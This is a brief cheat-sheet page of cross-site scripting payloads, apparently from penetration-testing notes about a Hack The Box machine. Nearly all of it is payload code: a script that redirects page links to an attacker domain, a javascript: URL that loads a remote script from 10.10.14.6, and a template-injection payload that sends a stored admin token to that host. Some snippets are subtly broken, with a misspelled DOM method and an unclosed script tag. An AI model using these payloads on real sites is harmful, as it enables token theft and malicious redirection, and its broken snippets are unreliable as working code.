XSS

XSS -> change HTML

<script>
document.getElementByTagName("a");
<script>

XSS -> change links name & location

<script>
var links = document.getElementByTagName("a");
links[0].href = "http://attackerdomain.com/";
links[0].innerHTML= "new link name";
</script>

Load Arbitrary JavaScript xss file

http://graph.htb/?redirect=javascript:document.body.innerHTML+='<script src="http://10.10.14.6/alert.js"></script>'

To leak the value from Local Storage

{{constructor.constructor('fetch("http://10.10.14.6/" + localStorage.getItem("adminToken"))')()}}

PreviousEAR NextCSRF + XSS (auth bypass)

Last updated 1 year ago